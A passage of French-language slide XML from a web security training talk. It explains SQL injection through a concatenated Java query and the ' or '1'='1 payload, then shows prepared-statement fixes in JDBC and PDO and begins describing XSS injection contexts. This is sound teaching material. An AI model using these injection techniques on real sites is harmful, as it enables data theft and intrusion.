              <a:t> String query = "SELECT user_id FROM user_data </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   WHERE user_name = '" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   + oe.encode( req.getParameter("userID")) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   + "' and user_password = '" </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   + oe.encode( req.getParameter("pwd")) +"'";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="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a:t>Une troisième solution : celle que j’ai toujours vu utilisée sur nos projets et qui ce qui fait nous n’avons pas été confrontés à ce type de faille</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>Pré-compilation de la requete dans la BDD avant insertion des données saisies par l’utilisateur </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" b="1">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dès que la BD reçoit cette déclaration , il le compile et met en cache afin qu'il puisse utiliser la dernière déclaration compilé pour appel successif de même déclaration . Ainsi, il devient pré-compilé pour les appels successifs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-279400" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>On peut définir l</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="800" b="1"/>
              <a:t>e type de la donnée </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>attendue (ici se sont des chaînes de caractère)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>empêche un éventuel code inséré dans les paramètres </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>d'être interprété </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t> : comme le or 1=1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>On recherche donc un compte qui a pour mdp la chaîne de caractère ‘ or ‘1’ = ‘1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java hibernate -  equivalent côté PHP PDO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>On peut ici aussi le combiner avec une expression régulièr</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr u="sng">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1" u="sng">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>D’un point de vu général et en particulier sur les injections ne jamais faire confiance aux données saisies par l’utilisateur</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" b="1"/>
              <a:t>Impact sévère sur les données du site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Un groupe de pirates informatiques a annoncé le piratage du site de la cité des métiers de Marseille. ZATAZ a constaté la diffusion de données nominatives volée dans la base de données.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>L’attaque n’a malheureusement rien d’exceptionnelle. Des pirates informatiques se sont attaqués au site Internet de la cité des métiers de Marseille et de Provence Alpes Côte d’Azur. Via une injection SQL exploitée à partir d’un logiciel trouvé sur Internet, le groupe de pirate a diffusé son attaque et les données qu’ils ont pu extraire. Plus de 300 identités, adresses mails de Français et Belges. Des informations inutiles pour des pirates non expérimentés mais qui pourraient servir à des spammeurs et autres escrocs 2.0.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JQL vs req.setParameter (JPA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>mysql_* vs PDO, concatenation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>TODOPGA aller plus loin sur le prepare statement qui le fait ? la BDD ? Toutes les BDD le font ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>MySQL stringescape</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r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>PDO est une extension de PHP inclus dans PHP qui permet de faire des requetes paramétrées comme JPA avec Hibernate JAVA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>En PHP, l'utilisation des requêtes multiples avec des requêtes préparées n'est pas supportée. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>mysqli ne permet pas de faire des requetes paramétrée</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>En java on a aussi JDBC (setXXX) : ancetre de JPA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>java.sql.PreparedStatement stmt = connection.prepareStatement(</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>               		"SELECT * FROM users WHERE USERNAME = ? AND ROOM = ?");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>	stmt.setString(1, username);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>	stmt.setInt(2, roomNumber);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>	stmt.executeQuery();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>En PHP, PDO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" indent="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>$stmt = $dbh-&gt;prepare("SELECT * FROM users WHERE USERNAME = ? AND PASSWORD = ?");</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr" sz="800"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>	$stmt-&gt;execute(array($username, $pass));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>Comment marche une prepared statement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800" b="1"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="800"/>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>This question cannot really be answered because it depends on the driver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>There are essentially two ways in which it works.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>One: The driver parses your query and identifies parameters. When you set the parameters the driver stores them and when you execute the driver builds the query from it's parsed bits and the bound parameters.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="137500"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>Two : The driver sends the query to the database where it is parsed (and perhaps a query plan is compiled) and a handle of some sort is returned to the driver. The driver then passes along the setXXX method calls and execute calls to the database directly.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="800"/>
              <a:t>And there can of course be variations of either. Like I said it depends on the database and driver. If this does not satisfy you then you can consult the source for one of the open source drivers like Jtds or the MySQL driver. </a:t>
            </a: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lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="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a:t>Pauline nous a montré les injections de type SQL, voyons à présent les injections javascript : les XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr"/>
              <a:t>Quand on parle de XSS, cela signifie qu’un attaquant tel que Oscar a été capable de corrompre une page web pour que celle-ci renvoie du code pour lequel elle n’a pas été prévu. C’est à dire que le navigateur affiche la page initiale et exécute en plus lele code injecté par l’attaquant.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78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Tout d’abord, détaillons un peu comment survient une faille XSS.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cette slide, présente une page HTML très basique. Le développeur utilise trois variables alimentées soit par la base de données, soit par un paramètre d’url soit par un cookie.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Les noms parlent d’eux même :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USER_COLOR pour la couleur du texte. La typiquement, on peut imaginer une drop down permettant de sélectionner la couleur dominante du site. Une fois sélectionné, cette information est enregistré dans un cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USER_NAME  le nom de l’utilisateur. Pris de la page de données ou d’un paramètre de l’url</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-317500" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="100000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>USER_DESCRIPTION la description de l’utilisateur remplie à partir de sa page de profil.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il faut savoir que chaque contexte de XSS est différent. En fonction de l’endroit dans le code, l’attaquant devra produire une chaîne de caractère spécifique pour exploiter la faille.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="14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78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sur cet exemple de code 3 variables et 4 contextes différents :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 9 : pour injecter du JavaScript, il faut d’abord fermer la balise style</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 11 : on peut écrire directement le script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 12 : ici le but va être de fermer le lien et d’ajouter un attribut onclick</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 15 : l’attaquant devra d’abord fermer le commentaire pour injecter son script</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1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78571"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sur cet exemple de code 3 variables et 4 contextes différents :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPct val="78571"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ligne 9 : pour injecter du JavaScript, il faut d’abord fermer la balise style</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-228600" rtl="0">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
